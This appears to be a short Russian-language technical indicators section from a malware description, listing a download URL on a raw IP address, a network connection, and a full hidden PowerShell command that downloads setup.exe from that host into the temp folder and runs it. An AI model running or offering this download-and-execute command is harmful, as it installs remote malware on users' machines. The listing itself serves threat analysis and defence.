Техническая информация
- http://45.33.59.129/setup.exe как %temp%\server.exe
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://45.33.59.129/setup.exe','%TEMP%\Server.exe');&start %TEMP%\Server.exe...
- '45.##.59.129':80